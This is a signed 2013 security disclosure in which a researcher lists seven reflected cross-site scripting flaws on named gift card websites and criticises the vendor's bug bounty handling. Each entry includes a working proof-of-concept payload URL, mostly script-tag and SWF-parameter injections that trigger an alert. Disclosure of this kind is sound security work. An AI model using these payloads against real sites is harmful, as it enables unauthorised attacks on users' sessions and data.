Multiple giftcard sites suffer from cross site scripting vulnerabilities. The vendor has failed to make good on their bug bounty program claiming they are duplicate findings but has never addressed the issues.
8a8a5b2527c53ec54d24e012abe5d9f6540c8d3fb6ccb01b41286319fc8fb060
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Since November 2013 I reported seven Cross-site Scripting
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible
given the simplicity of the vulnerabilities.
But what I really don't understand: Why do they still work until today?
######################################
# 11/17/2013 Vulnerability #1: (DUP) #
######################################
// Reflected Cross-site Scripting
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//
// Original advisory
http://insight-labs.org/?p=738
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG
#########################################################
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #
#########################################################
// Reflected Cross-site Scripting (tested with FF 25.0.1)
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
// Original Advisory
http://inj3ct0rs.com/exploit/description/19711
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG
######################################
# 11/21/2013 Vulnerability #3: (DUP) #
######################################
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox
25.0.1)
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);
Screenshots:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG
http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG
######################################
# 11/26/2013 Vulnerability #4: (DUP) #
######################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #5: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #6: #
################################
// Reflected Cross-site Scripting with IE10
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG
################################
# 12/05/2013 Vulnerability #7: #
################################
// Reflected Cross-site Scripting with IE10
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
Screenshot:
http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG
Cheers,
sschurtz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s
8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P
=SZx4
-----END PGP SIGNATURE-----